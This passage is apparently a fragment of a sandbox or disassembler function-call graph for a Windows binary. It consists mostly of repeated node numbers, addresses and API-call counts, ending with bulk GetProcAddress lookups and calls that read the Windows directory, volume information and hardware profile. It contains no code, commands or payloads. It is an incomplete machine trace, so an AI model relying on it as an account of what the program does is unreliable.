26738->26739 26740 29d84750 17 API calls 26739->26740 26741 29d820b4 26740->26741 26742 29d84750 17 API calls 26741->26742 26743 29d820cd 26742->26743 26744 29d84750 17 API calls 26743->26744 26745 29d820e6 26744->26745 26746 29d84750 17 API calls 26745->26746 26747 29d820ff 26746->26747 26748 29d84750 17 API calls 26747->26748 26749 29d82118 26748->26749 26750 29d84750 17 API calls 26749->26750 26751 29d82131 26750->26751 26752 29d84750 17 API calls 26751->26752 26753 29d8214a 26752->26753 26754 29d84750 17 API calls 26753->26754 26755 29d82163 26754->26755 26756 29d84750 17 API calls 26755->26756 26757 29d8217c 26756->26757 26758 29d84750 17 API calls 26757->26758 26759 29d82195 26758->26759 26760 29d84750 17 API calls 26759->26760 26761 29d821ae 26760->26761 26762 29d84750 17 API calls 26761->26762 26763 29d821c7 26762->26763 26764 29d84750 17 API calls 26763->26764 26765 29d821e0 26764->26765 26766 29d84750 17 API calls 26765->26766 26767 29d821f9 26766->26767 26768 29d84750 17 API calls 26767->26768 26769 29d82212 26768->26769 26770 29d84750 17 API calls 26769->26770 26771 29d8222b 26770->26771 26772 29d84750 17 API calls 26771->26772 26773 29d82244 26772->26773 26774 29d84750 17 API calls 26773->26774 26775 29d8225d 26774->26775 26776 29d84750 17 API calls 26775->26776 26777 29d82276 26776->26777 26778 29d84750 17 API calls 26777->26778 26779 29d8228f 26778->26779 26780 29d84750 17 API calls 26779->26780 26781 29d822a8 26780->26781 26782 29d84750 17 API calls 26781->26782 26783 29d822c1 26782->26783 26784 29d84750 17 API calls 26783->26784 26785 29d822da 26784->26785 26786 29d84750 17 API calls 26785->26786 26787 29d822f3 26786->26787 26788 29d84750 17 API calls 26787->26788 26789 29d8230c 26788->26789 26790 29d84750 17 API calls 26789->26790 26791 29d82325 26790->26791 26792 29d84750 17 API calls 26791->26792 26793 29d8233e 26792->26793 26794 29d84750 17 API calls 26793->26794 26795 29d82357 26794->26795 26796 29d84750 17 API calls 26795->26796 26797 29d82370 26796->26797 26798 29d84750 17 API calls 26797->26798 26799 29d82389 26798->26799 26800 29d84750 17 API calls 26799->26800 26801 29d823a2 26800->26801 26802 29d84750 17 API calls 26801->26802 26803 29d823bb 26802->26803 26804 29d84750 17 API calls 26803->26804 26805 29d823d4 26804->26805 26806 29d84750 17 API calls 26805->26806 26807 29d823ed 26806->26807 26808 29d84750 17 API calls 26807->26808 26809 29d82406 26808->26809 26810 29d84750 17 API calls 26809->26810 26811 29d8241f 26810->26811 26812 29d84750 17 API calls 26811->26812 26813 29d82438 26812->26813 26814 29d84750 17 API calls 26813->26814 26815 29d82451 26814->26815 26816 29d84750 17 API calls 26815->26816 26817 29d8246a 26816->26817 26818 29d84750 17 API calls 26817->26818 26819 29d82483 26818->26819 26820 29d84750 17 API calls 26819->26820 26821 29d8249c 26820->26821 26822 29d84750 17 API calls 26821->26822 26823 29d824b5 26822->26823 26824 29d84750 17 API calls 26823->26824 26825 29d824ce 26824->26825 26826 29d84750 17 API calls 26825->26826 26827 29d824e7 26826->26827 26828 29d84750 17 API calls 26827->26828 26829 29d82500 26828->26829 26830 29d84750 17 API calls 26829->26830 26831 29d82519 26830->26831 26832 29d84750 17 API calls 26831->26832 26833 29d82532 26832->26833 26834 29d84750 17 API calls 26833->26834 26835 29d8254b 26834->26835 26836 29d84750 17 API calls 26835->26836 26837 29d82564 26836->26837 26838 29d84750 17 API calls 26837->26838 26839 29d8257d 26838->26839 26840 29d84750 17 API calls 26839->26840 26841 29d82596 26840->26841 26842 29d84750 17 API calls 26841->26842 26843 29d825af 26842->26843 26844 29d84750 17 API calls 26843->26844 26845 29d825c8 26844->26845 26846 29d84750 17 API calls 26845->26846 26847 29d825e1 26846->26847 26848 29d84750 17 API calls 26847->26848 26849 29d825fa 26848->26849 26850 29d84750 17 API calls 26849->26850 26851 29d82613 26850->26851 26852 29d84750 17 API calls 26851->26852 26853 29d8262c 26852->26853 26854 29d84750 17 API calls 26853->26854 26855 29d82645 26854->26855 26856 29d84750 17 API calls 26855->26856 26857 29d8265e 26856->26857 26858 29d84750 17 API calls 26857->26858 26859 29d82677 26858->26859 26860 29d84750 17 API calls 26859->26860 26861 29d82690 26860->26861 26862 29d84750 17 API calls 26861->26862 26863 29d826a9 26862->26863 26864 29d84750 17 API calls 26863->26864 26865 29d826c2 26864->26865 26866 29d84750 17 API calls 26865->26866 26867 29d826db 26866->26867 26868 29d84750 17 API calls 26867->26868 26869 29d826f4 26868->26869 26870 29d84750 17 API calls 26869->26870 26871 29d8270d 26870->26871 26872 29d84750 17 API calls 26871->26872 26873 29d82726 26872->26873 26874 29d84750 17 API calls 26873->26874 26875 29d8273f 26874->26875 26876 29d84750 17 API calls 26875->26876 26877 29d82758 26876->26877 26878 29d84750 17 API calls 26877->26878 26879 29d82771 26878->26879 26880 29d84750 17 API calls 26879->26880 26881 29d8278a 26880->26881 26882 29d84750 17 API calls 26881->26882 26883 29d827a3 26882->26883 26884 29d84750 17 API calls 26883->26884 26885 29d827bc 26884->26885 26886 29d84750 17 API calls 26885->26886 26887 29d827d5 26886->26887 26888 29d84750 17 API calls 26887->26888 26889 29d827ee 26888->26889 26890 29d84750 17 API calls 26889->26890 26891 29d82807 26890->26891 26892 29d84750 17 API calls 26891->26892 26893 29d82820 26892->26893 26894 29d84750 17 API calls 26893->26894 26895 29d82839 26894->26895 26896 29d84750 17 API calls 26895->26896 26897 29d82852 26896->26897 26898 29d84750 17 API calls 26897->26898 26899 29d8286b 26898->26899 26900 29d84750 17 API calls 26899->26900 26901 29d82884 26900->26901 26902 29d84750 17 API calls 26901->26902 26903 29d8289d 26902->26903 26904 29d84750 17 API calls 26903->26904 26905 29d828b6 26904->26905 26906 29d84750 17 API calls 26905->26906 26907 29d828cf 26906->26907 26908 29d84750 17 API calls 26907->26908 26909 29d828e8 26908->26909 26910 29d84750 17 API calls 26909->26910 26911 29d82901 26910->26911 26912 29d84750 17 API calls 26911->26912 26913 29d8291a 26912->26913 26914 29d84750 17 API calls 26913->26914 26915 29d82933 26914->26915 26916 29d84750 17 API calls 26915->26916 26917 29d8294c 26916->26917 26918 29d84750 17 API calls 26917->26918 26919 29d82965 26918->26919 26920 29d84750 17 API calls 26919->26920 26921 29d8297e 26920->26921 26922 29d84750 17 API calls 26921->26922 26923 29d82997 26922->26923 26924 29d84750 17 API calls 26923->26924 26925 29d829b0 26924->26925 26926 29d84750 17 API calls 26925->26926 26927 29d829c9 26926->26927 26928 29d84750 17 API calls 26927->26928 26929 29d829e2 26928->26929 26930 29d84750 17 API calls 26929->26930 26931 29d829fb 26930->26931 26932 29d84750 17 API calls 26931->26932 26933 29d82a14 26932->26933 26934 29d84750 17 API calls 26933->26934 26935 29d82a2d 26934->26935 26936 29d84750 17 API calls 26935->26936 26937 29d82a46 26936->26937 26938 29d84750 17 API calls 26937->26938 26939 29d82a5f 26938->26939 26940 29d84750 17 API calls 26939->26940 26941 29d82a78 26940->26941 26942 29d84750 17 API calls 26941->26942 26943 29d82a91 26942->26943 26944 29d84750 17 API calls 26943->26944 26945 29d82aaa 26944->26945 26946 29d84750 17 API calls 26945->26946 26947 29d82ac3 26946->26947 26948 29d84750 17 API calls 26947->26948 26949 29d82adc 26948->26949 26950 29d84750 17 API calls 26949->26950 26951 29d82af5 26950->26951 26952 29d84750 17 API calls 26951->26952 26953 29d82b0e 26952->26953 26954 29d84750 17 API calls 26953->26954 26955 29d82b27 26954->26955 26956 29d84750 17 API calls 26955->26956 26957 29d82b40 26956->26957 26958 29d84750 17 API calls 26957->26958 26959 29d82b59 26958->26959 26960 29d84750 17 API calls 26959->26960 26961 29d82b72 26960->26961 26962 29d84750 17 API calls 26961->26962 26963 29d82b8b 26962->26963 26964 29d84750 17 API calls 26963->26964 26965 29d82ba4 26964->26965 26966 29d84750 17 API calls 26965->26966 26967 29d82bbd 26966->26967 26968 29d84750 17 API calls 26967->26968 26969 29d82bd6 26968->26969 26970 29d84750 17 API calls 26969->26970 26971 29d82bef 26970->26971 26972 29d84750 17 API calls 26971->26972 26973 29d82c08 26972->26973 26974 29d84750 17 API calls 26973->26974 26975 29d82c21 26974->26975 26976 29d84750 17 API calls 26975->26976 26977 29d82c3a 26976->26977 26978 29d84750 17 API calls 26977->26978 26979 29d82c53 26978->26979 26980 29d84750 17 API calls 26979->26980 26981 29d82c6c 26980->26981 26982 29d84750 17 API calls 26981->26982 26983 29d82c85 26982->26983 26984 29d84750 17 API calls 26983->26984 26985 29d82c9e 26984->26985 26986 29d84750 17 API calls 26985->26986 26987 29d82cb7 26986->26987 26988 29d84750 17 API calls 26987->26988 26989 29d82cd0 26988->26989 26990 29d84750 17 API calls 26989->26990 26991 29d82ce9 26990->26991 26992 29d84750 17 API calls 26991->26992 26993 29d82d02 26992->26993 26994 29d84750 17 API calls 26993->26994 26995 29d82d1b 26994->26995 26996 29d84750 17 API calls 26995->26996 26997 29d82d34 26996->26997 26998 29d84750 17 API calls 26997->26998 26999 29d82d4d 26998->26999 27000 29d84750 17 API calls 26999->27000 27001 29d82d66 27000->27001 27002 29d84750 17 API calls 27001->27002 27003 29d82d7f 27002->27003 27004 29d84750 17 API calls 27003->27004 27005 29d82d98 27004->27005 27006 29d84750 17 API calls 27005->27006 27007 29d82db1 27006->27007 27008 29d84750 17 API calls 27007->27008 27009 29d82dca 27008->27009 27010 29d84750 17 API calls 27009->27010 27011 29d82de3 27010->27011 27012 29d84750 17 API calls 27011->27012 27013 29d82dfc 27012->27013 27014 29d84750 17 API calls 27013->27014 27015 29d82e15 27014->27015 27016 29d84750 17 API calls 27015->27016 27017 29d82e2e 27016->27017 27018 29d84750 17 API calls 27017->27018 27019 29d82e47 27018->27019 27020 29d84750 17 API calls 27019->27020 27021 29d82e60 27020->27021 27022 29d84750 17 API calls 27021->27022 27023 29d82e79 27022->27023 27024 29d84750 17 API calls 27023->27024 27025 29d82e92 27024->27025 27026 29d84750 17 API calls 27025->27026 27027 29d82eab 27026->27027 27028 29d84750 17 API calls 27027->27028 27029 29d82ec4 27028->27029 27030 29d84750 17 API calls 27029->27030 27031 29d82edd 27030->27031 27032 29d84750 17 API calls 27031->27032 27033 29d82ef6 27032->27033 27034 29d84750 17 API calls 27033->27034 27035 29d82f0f 27034->27035 27036 29d84750 17 API calls 27035->27036 27037 29d82f28 27036->27037 27038 29d84750 17 API calls 27037->27038 27039 29d82f41 27038->27039 27040 29d84750 17 API calls 27039->27040 27041 29d82f5a 27040->27041 27042 29d84750 17 API calls 27041->27042 27043 29d82f73 27042->27043 27044 29d84750 17 API calls 27043->27044 27045 29d82f8c 27044->27045 27046 29d84750 17 API calls 27045->27046 27047 29d82fa5 27046->27047 27048 29d84750 17 API calls 27047->27048 27049 29d82fbe 27048->27049 27050 29d84750 17 API calls 27049->27050 27051 29d82fd7 27050->27051 27052 29d84750 17 API calls 27051->27052 27053 29d82ff0 27052->27053 27054 29d84750 17 API calls 27053->27054 27055 29d83009 27054->27055 27056 29d84750 17 API calls 27055->27056 27057 29d83022 27056->27057 27058 29d84750 17 API calls 27057->27058 27059 29d8303b 27058->27059 27060 29d84750 17 API calls 27059->27060 27061 29d83054 27060->27061 27062 29d84750 17 API calls 27061->27062 27063 29d8306d 27062->27063 27064 29d84750 17 API calls 27063->27064 27065 29d83086 27064->27065 27066 29d84750 17 API calls 27065->27066 27067 29d8309f 27066->27067 27068 29d84750 17 API calls 27067->27068 27069 29d830b8 27068->27069 27070 29d84750 17 API calls 27069->27070 27071 29d830d1 27070->27071 27072 29d84750 17 API calls 27071->27072 27073 29d830ea 27072->27073 27074 29d84750 17 API calls 27073->27074 27075 29d83103 27074->27075 27076 29d84750 17 API calls 27075->27076 27077 29d8311c 27076->27077 27078 29d84750 17 API calls 27077->27078 27079 29d83135 27078->27079 27080 29d84750 17 API calls 27079->27080 27081 29d8314e 27080->27081 27082 29d84750 17 API calls 27081->27082 27083 29d83167 27082->27083 27084 29d84750 17 API calls 27083->27084 27085 29d83180 27084->27085 27086 29d84750 17 API calls 27085->27086 27087 29d83199 27086->27087 27088 29d84750 17 API calls 27087->27088 27089 29d831b2 27088->27089 27090 29d84750 17 API calls 27089->27090 27091 29d831cb 27090->27091 27092 29d84750 17 API calls 27091->27092 27093 29d831e4 27092->27093 27094 29d84750 17 API calls 27093->27094 27095 29d831fd 27094->27095 27096 29d84750 17 API calls 27095->27096 27097 29d83216 27096->27097 27098 29d84750 17 API calls 27097->27098 27099 29d8322f 27098->27099 27100 29d84750 17 API calls 27099->27100 27101 29d83248 27100->27101 27102 29d84750 17 API calls 27101->27102 27103 29d83261 27102->27103 27104 29d84750 17 API calls 27103->27104 27105 29d8327a 27104->27105 27106 29d84750 17 API calls 27105->27106 27107 29d83293 27106->27107 27108 29d84750 17 API calls 27107->27108 27109 29d832ac 27108->27109 27110 29d84750 17 API calls 27109->27110 27111 29d832c5 27110->27111 27112 29d84750 17 API calls 27111->27112 27113 29d832de 27112->27113 27114 29d84750 17 API calls 27113->27114 27115 29d832f7 27114->27115 27116 29d84750 17 API calls 27115->27116 27117 29d83310 27116->27117 27118 29d84750 17 API calls 27117->27118 27119 29d83329 27118->27119 27120 29d84750 17 API calls 27119->27120 27121 29d83342 27120->27121 27122 29d84750 17 API calls 27121->27122 27123 29d8335b 27122->27123 27124 29d84750 17 API calls 27123->27124 27125 29d83374 27124->27125 27126 29d84750 17 API calls 27125->27126 27127 29d8338d 27126->27127 27128 29d84750 17 API calls 27127->27128 27129 29d833a6 27128->27129 27130 29d84750 17 API calls 27129->27130 27131 29d833bf 27130->27131 27132 29d84750 17 API calls 27131->27132 27133 29d833d8 27132->27133 27134 29d84750 17 API calls 27133->27134 27135 29d833f1 27134->27135 27136 29d84750 17 API calls 27135->27136 27137 29d8340a 27136->27137 27138 29d84750 17 API calls 27137->27138 27139 29d83423 27138->27139 27140 29d84750 17 API calls 27139->27140 27141 29d8343c 27140->27141 27142 29d84750 17 API calls 27141->27142 27143 29d83455 27142->27143 27144 29d84750 17 API calls 27143->27144 27145 29d8346e 27144->27145 27146 29d84750 17 API calls 27145->27146 27147 29d83487 27146->27147 27148 29d84750 17 API calls 27147->27148 27149 29d834a0 27148->27149 27150 29d84750 17 API calls 27149->27150 27151 29d834b9 27150->27151 27152 29d84750 17 API calls 27151->27152 27153 29d834d2 27152->27153 27154 29d84750 17 API calls 27153->27154 27155 29d834eb 27154->27155 27156 29d84750 17 API calls 27155->27156 27157 29d83504 27156->27157 27158 29d84750 17 API calls 27157->27158 27159 29d8351d 27158->27159 27160 29d84750 17 API calls 27159->27160 27161 29d83536 27160->27161 27162 29d84750 17 API calls 27161->27162 27163 29d8354f 27162->27163 27164 29d84750 17 API calls 27163->27164 27165 29d83568 27164->27165 27166 29d84750 17 API calls 27165->27166 27167 29d83581 27166->27167 27168 29d84750 17 API calls 27167->27168 27169 29d8359a 27168->27169 27170 29d84750 17 API calls 27169->27170 27171 29d835b3 27170->27171 27172 29d84750 17 API calls 27171->27172 27173 29d835cc 27172->27173 27174 29d84750 17 API calls 27173->27174 27175 29d835e5 27174->27175 27176 29d84750 17 API calls 27175->27176 27177 29d835fe 27176->27177 27178 29d84750 17 API calls 27177->27178 27179 29d83617 27178->27179 27180 29d84750 17 API calls 27179->27180 27181 29d83630 27180->27181 27182 29d84750 17 API calls 27181->27182 27183 29d83649 27182->27183 27184 29d84750 17 API calls 27183->27184 27185 29d83662 27184->27185 27186 29d84750 17 API calls 27185->27186 27187 29d8367b 27186->27187 27188 29d84750 17 API calls 27187->27188 27189 29d83694 27188->27189 27190 29d84750 17 API calls 27189->27190 27191 29d836ad 27190->27191 27192 29d84750 17 API calls 27191->27192 27193 29d836c6 27192->27193 27194 29d84750 17 API calls 27193->27194 27195 29d836df 27194->27195 27196 29d84750 17 API calls 27195->27196 27197 29d836f8 27196->27197 27198 29d84750 17 API calls 27197->27198 27199 29d83711 27198->27199 27200 29d84750 17 API calls 27199->27200 27201 29d8372a 27200->27201 27202 29d84750 17 API calls 27201->27202 27203 29d83743 27202->27203 27204 29d84750 17 API calls 27203->27204 27205 29d8375c 27204->27205 27206 29d84750 17 API calls 27205->27206 27207 29d83775 27206->27207 27208 29d84750 17 API calls 27207->27208 27209 29d8378e 27208->27209 27210 29d84750 17 API calls 27209->27210 27211 29d837a7 27210->27211 27212 29d84750 17 API calls 27211->27212 27213 29d837c0 27212->27213 27214 29d84750 17 API calls 27213->27214 27215 29d837d9 27214->27215 27216 29d84750 17 API calls 27215->27216 27217 29d837f2 27216->27217 27218 29d84750 17 API calls 27217->27218 27219 29d8380b 27218->27219 27220 29d84750 17 API calls 27219->27220 27221 29d83824 27220->27221 27222 29d84750 17 API calls 27221->27222 27223 29d8383d 27222->27223 27224 29d84750 17 API calls 27223->27224 27225 29d83856 27224->27225 27226 29d84750 17 API calls 27225->27226 27227 29d8386f 27226->27227 27228 29d84750 17 API calls 27227->27228 27229 29d83888 27228->27229 27230 29d84750 17 API calls 27229->27230 27231 29d838a1 27230->27231 27232 29d84750 17 API calls 27231->27232 27233 29d838ba 27232->27233 27234 29d84750 17 API calls 27233->27234 27235 29d838d3 27234->27235 27236 29d84750 17 API calls 27235->27236 27237 29d838ec 27236->27237 27238 29d84750 17 API calls 27237->27238 27239 29d83905 27238->27239 27240 29d84750 17 API calls 27239->27240 27241 29d8391e 27240->27241 27242 29d84750 17 API calls 27241->27242 27243 29d83937 27242->27243 27244 29d84750 17 API calls 27243->27244 27245 29d83950 27244->27245 27246 29d84750 17 API calls 27245->27246 27247 29d83969 27246->27247 27248 29d84750 17 API calls 27247->27248 27249 29d83982 27248->27249 27250 29d84750 17 API calls 27249->27250 27251 29d8399b 27250->27251 27252 29d84750 17 API calls 27251->27252 27253 29d839b4 27252->27253 27254 29d84750 17 API calls 27253->27254 27255 29d839cd 27254->27255 27256 29d84750 17 API calls 27255->27256 27257 29d839e6 27256->27257 27258 29d84750 17 API calls 27257->27258 27259 29d839ff 27258->27259 27260 29d84750 17 API calls 27259->27260 27261 29d83a18 27260->27261 27262 29d84750 17 API calls 27261->27262 27263 29d83a31 27262->27263 27264 29d84750 17 API calls 27263->27264 27265 29d83a4a 27264->27265 27266 29d84750 17 API calls 27265->27266 27267 29d83a63 27266->27267 27268 29d84750 17 API calls 27267->27268 27269 29d83a7c 27268->27269 27270 29d84750 17 API calls 27269->27270 27271 29d83a95 27270->27271 27272 29d84750 17 API calls 27271->27272 27273 29d83aae 27272->27273 27274 29d84750 17 API calls 27273->27274 27275 29d83ac7 27274->27275 27276 29d84750 17 API calls 27275->27276 27277 29d83ae0 27276->27277 27278 29d84750 17 API calls 27277->27278 27279 29d83af9 27278->27279 27280 29d84750 17 API calls 27279->27280 27281 29d83b12 27280->27281 27282 29d84750 17 API calls 27281->27282 27283 29d83b2b 27282->27283 27284 29d84750 17 API calls 27283->27284 27285 29d83b44 27284->27285 27286 29d84750 17 API calls 27285->27286 27287 29d83b5d 27286->27287 27288 29d84750 17 API calls 27287->27288 27289 29d83b76 27288->27289 27290 29d84750 17 API calls 27289->27290 27291 29d83b8f 27290->27291 27292 29d84750 17 API calls 27291->27292 27293 29d83ba8 27292->27293 27294 29d84750 17 API calls 27293->27294 27295 29d83bc1 27294->27295 27296 29d84750 17 API calls 27295->27296 27297 29d83bda 27296->27297 27298 29d84750 17 API calls 27297->27298 27299 29d83bf3 27298->27299 27300 29d84750 17 API calls 27299->27300 27301 29d83c0c 27300->27301 27302 29d84750 17 API calls 27301->27302 27303 29d83c25 27302->27303 27304 29d84750 17 API calls 27303->27304 27305 29d83c3e 27304->27305 27306 29d84750 17 API calls 27305->27306 27307 29d83c57 27306->27307 27308 29d84750 17 API calls 27307->27308 27309 29d83c70 27308->27309 27310 29d84750 17 API calls 27309->27310 27311 29d83c89 27310->27311 27312 29d84750 17 API calls 27311->27312 27313 29d83ca2 27312->27313 27314 29d84750 17 API calls 27313->27314 27315 29d83cbb 27314->27315 27316 29d84750 17 API calls 27315->27316 27317 29d83cd4 27316->27317 27318 29d84750 17 API calls 27317->27318 27319 29d83ced 27318->27319 27320 29d84750 17 API calls 27319->27320 27321 29d83d06 27320->27321 27322 29d84750 17 API calls 27321->27322 27323 29d83d1f 27322->27323 27324 29d84750 17 API calls 27323->27324 27325 29d83d38 27324->27325 27326 29d84750 17 API calls 27325->27326 27327 29d83d51 27326->27327 27328 29d84750 17 API calls 27327->27328 27329 29d83d6a 27328->27329 27330 29d84750 17 API calls 27329->27330 27331 29d83d83 27330->27331 27332 29d84750 17 API calls 27331->27332 27333 29d83d9c 27332->27333 27334 29d84750 17 API calls 27333->27334 27335 29d83db5 27334->27335 27336 29d84750 17 API calls 27335->27336 27337 29d83dce 27336->27337 27338 29d84750 17 API calls 27337->27338 27339 29d83de7 27338->27339 27340 29d84750 17 API calls 27339->27340 27341 29d83e00 27340->27341 27342 29d84750 17 API calls 27341->27342 27343 29d83e19 27342->27343 27344 29d84750 17 API calls 27343->27344 27345 29d83e32 27344->27345 27346 29d84750 17 API calls 27345->27346 27347 29d83e4b 27346->27347 27348 29d84750 17 API calls 27347->27348 27349 29d83e64 27348->27349 27350 29d84750 17 API calls 27349->27350 27351 29d83e7d 27350->27351 27352 29d84750 17 API calls 27351->27352 27353 29d83e96 27352->27353 27354 29d84750 17 API calls 27353->27354 27355 29d83eaf 27354->27355 27356 29d84750 17 API calls 27355->27356 27357 29d83ec8 27356->27357 27358 29d84750 17 API calls 27357->27358 27359 29d83ee1 27358->27359 27360 29d84750 17 API calls 27359->27360 27361 29d83efa 27360->27361 27362 29d84750 17 API calls 27361->27362 27363 29d83f13 27362->27363 27364 29d84750 17 API calls 27363->27364 27365 29d83f2c 27364->27365 27366 29d84750 17 API calls 27365->27366 27367 29d83f45 27366->27367 27368 29d84750 17 API calls 27367->27368 27369 29d83f5e 27368->27369 27370 29d84750 17 API calls 27369->27370 27371 29d83f77 27370->27371 27372 29d84750 17 API calls 27371->27372 27373 29d83f90 27372->27373 27374 29d84750 17 API calls 27373->27374 27375 29d83fa9 27374->27375 27376 29d84750 17 API calls 27375->27376 27377 29d83fc2 27376->27377 27378 29d84750 17 API calls 27377->27378 27379 29d83fdb 27378->27379 27380 29d84750 17 API calls 27379->27380 27381 29d83ff4 27380->27381 27382 29d84750 17 API calls 27381->27382 27383 29d8400d 27382->27383 27384 29d84750 17 API calls 27383->27384 27385 29d84026 27384->27385 27386 29d84750 17 API calls 27385->27386 27387 29d8403f 27386->27387 27388 29d84750 17 API calls 27387->27388 27389 29d84058 27388->27389 27390 29d84750 17 API calls 27389->27390 27391 29d84071 27390->27391 27392 29d84750 17 API calls 27391->27392 27393 29d8408a 27392->27393 27394 29d84750 17 API calls 27393->27394 27395 29d840a3 27394->27395 27396 29d84750 17 API calls 27395->27396 27397 29d840bc 27396->27397 27398 29d84750 17 API calls 27397->27398 27399 29d840d5 27398->27399 27400 29d84750 17 API calls 27399->27400 27401 29d840ee 27400->27401 27402 29d84750 17 API calls 27401->27402 27403 29d84107 27402->27403 27404 29d84750 17 API calls 27403->27404 27405 29d84120 27404->27405 27406 29d84750 17 API calls 27405->27406 27407 29d84139 27406->27407 27408 29d84750 17 API calls 27407->27408 27409 29d84152 27408->27409 27410 29d84750 17 API calls 27409->27410 27411 29d8416b 27410->27411 27412 29d84750 17 API calls 27411->27412 27413 29d84184 27412->27413 27414 29d84750 17 API calls 27413->27414 27415 29d8419d 27414->27415 27416 29d84750 17 API calls 27415->27416 27417 29d841b6 27416->27417 27418 29d84750 17 API calls 27417->27418 27419 29d841cf 27418->27419 27420 29d84750 17 API calls 27419->27420 27421 29d841e8 27420->27421 27422 29d84750 17 API calls 27421->27422 27423 29d84201 27422->27423 27424 29d84750 17 API calls 27423->27424 27425 29d8421a 27424->27425 27426 29d84750 17 API calls 27425->27426 27427 29d84233 27426->27427 27428 29d84750 17 API calls 27427->27428 27429 29d8424c 27428->27429 27430 29d84750 17 API calls 27429->27430 27431 29d84265 27430->27431 27432 29d84750 17 API calls 27431->27432 27433 29d8427e 27432->27433 27434 29d84750 17 API calls 27433->27434 27435 29d84297 27434->27435 27436 29d84750 17 API calls 27435->27436 27437 29d842b0 27436->27437 27438 29d84750 17 API calls 27437->27438 27439 29d842c9 27438->27439 27440 29d84750 17 API calls 27439->27440 27441 29d842e2 27440->27441 27442 29d84750 17 API calls 27441->27442 27443 29d842fb 27442->27443 27444 29d84750 17 API calls 27443->27444 27445 29d84314 27444->27445 27446 29d84750 17 API calls 27445->27446 27447 29d8432d 27446->27447 27448 29d84750 17 API calls 27447->27448 27449 29d84346 27448->27449 27450 29d84750 17 API calls 27449->27450 27451 29d8435f 27450->27451 27452 29d84750 17 API calls 27451->27452 27453 29d84378 27452->27453 27454 29d84750 17 API calls 27453->27454 27455 29d84391 27454->27455 27456 29d84750 17 API calls 27455->27456 27457 29d843aa 27456->27457 27458 29d84750 17 API calls 27457->27458 27459 29d843c3 27458->27459 27460 29d84750 17 API calls 27459->27460 27461 29d843dc 27460->27461 27462 29d84750 17 API calls 27461->27462 27463 29d843f5 27462->27463 27464 29d84750 17 API calls 27463->27464 27465 29d8440e 27464->27465 27466 29d84750 17 API calls 27465->27466 27467 29d84427 27466->27467 27468 29d84750 17 API calls 27467->27468 27469 29d84440 27468->27469 27470 29d84750 17 API calls 27469->27470 27471 29d84459 27470->27471 27472 29d84750 17 API calls 27471->27472 27473 29d84472 27472->27473 27474 29d84750 17 API calls 27473->27474 27475 29d8448b 27474->27475 27476 29d84750 17 API calls 27475->27476 27477 29d844a4 27476->27477 27478 29d84750 17 API calls 27477->27478 27479 29d844bd 27478->27479 27480 29d84750 17 API calls 27479->27480 27481 29d844d6 27480->27481 27482 29d84750 17 API calls 27481->27482 27483 29d844ef 27482->27483 27484 29d84750 17 API calls 27483->27484 27485 29d84508 27484->27485 27486 29d84750 17 API calls 27485->27486 27487 29d84521 27486->27487 27488 29d84750 17 API calls 27487->27488 27489 29d8453a 27488->27489 27490 29d84750 17 API calls 27489->27490 27491 29d84553 27490->27491 27492 29d84750 17 API calls 27491->27492 27493 29d8456c 27492->27493 27494 29d84750 17 API calls 27493->27494 27495 29d84585 27494->27495 27496 29d84750 17 API calls 27495->27496 27497 29d8459e 27496->27497 27498 29d84750 17 API calls 27497->27498 27499 29d845b7 27498->27499 27500 29d84750 17 API calls 27499->27500 27501 29d845d0 27500->27501 27502 29d84750 17 API calls 27501->27502 27503 29d845e9 27502->27503 27504 29d84750 17 API calls 27503->27504 27505 29d84602 27504->27505 27506 29d84750 17 API calls 27505->27506 27507 29d8461b 27506->27507 27508 29d84750 17 API calls 27507->27508 27509 29d84634 27508->27509 27510 29d84750 17 API calls 27509->27510 27511 29d8464d 27510->27511 27512 29d84750 17 API calls 27511->27512 27513 29d84666 27512->27513 27514 29d84750 17 API calls 27513->27514 27515 29d8467f 27514->27515 27516 29d84750 17 API calls 27515->27516 27517 29d84698 27516->27517 27518 29d84750 17 API calls 27517->27518 27519 29d846b1 27518->27519 27520 29d84750 17 API calls 27519->27520 27521 29d846ca 27520->27521 27522 29d84750 17 API calls 27521->27522 27523 29d846e3 27522->27523 27524 29d84750 17 API calls 27523->27524 27525 29d846fc 27524->27525 27526 29d84750 17 API calls 27525->27526 27527 29d84715 27526->27527 27528 29d84750 17 API calls 27527->27528 27529 29d8472e 27528->27529 27530 29d84750 17 API calls 27529->27530 27531 29d84747 27530->27531 27532 29da8390 27533 29da839d 59 API calls 27532->27533 27534 29da8933 11 API calls 27532->27534 27533->27534 27535 29da8a03 6 API calls 27534->27535 27536 29da8a90 27534->27536 27535->27536 27537 29da8a99 GetProcAddress GetProcAddress GetProcAddress 27536->27537 27538 29da8add 27536->27538 27537->27538 27539 29da8aea 15 API calls 27538->27539 27540 29da8c52 27538->27540 27539->27540 27541 29da8c5f 13 API calls 27540->27541 27542 29da8d96 27540->27542 27541->27542 27543 29da8e48 27542->27543 27544 29da8da3 7 API calls 27542->27544 27545 29da8e51 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 27543->27545 27546 29da8ec5 27543->27546 27544->27543 27545->27546 27547 29da8fd8 27546->27547 27548 29da8ed2 11 API calls 27546->27548 27549 29da8fe1 GetProcAddress GetProcAddress GetProcAddress 27547->27549 27550 29da9025 27547->27550 27548->27547 27549->27550 27551 29da902e GetProcAddress GetProcAddress GetProcAddress 27550->27551 27552 29da9072 27550->27552 27551->27552 27553 29da907f 6 API calls 27552->27553 27554 29da910c 27552->27554 27553->27554 27555 29da9128 27554->27555 27556 29da9115 GetProcAddress 27554->27556 27557 29da91f2 27555->27557 27558 29da9135 8 API calls 27555->27558 27556->27555 27558->27557 27559 29da2920 GetWindowsDirectoryA 27560 29da298b 27559->27560 27561 29da2992 GetVolumeInformationA GetProcessHeap HeapAlloc 27559->27561 27560->27561 27562 29da2b32 wsprintfA 27561->27562 27565 29da2a8d 27561->27565 27563 29da2b56 27562->27563 27563->27563 27586 29d95540 27563->27586 27567 29da2aba 27565->27567 27621 29dad440 67 API calls 2 library calls 27565->27621 27584 29da2acd std::ios_base::_Tidy _memmove 27567->27584 27622 29d89750 27567->27622 27569 29da2bc8 27602 29da3460 GetCurrentHwProfileA 27569->27602 27570 29da2b6d 27570->27569 27570->27584 27632 29dafc0b 85 API calls __tolower_l 27570->27632 27574 29dadf46 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 27576 29da2e7d 27574->27576 27580 29d951e0 77 API calls 27581 29da2c15 27580->27581 27633 29da42c0 77 API calls 27581->27633 27583 29da2c2d 27634 29d89980 77 API calls 27583->27634 27584->27574 27587 29d955a0 27586->27587 27590 29d9554d 27586->27590 27588 29d955b9 27587->27588 27645 29dad440 67 API calls 2 library calls 27587->27645 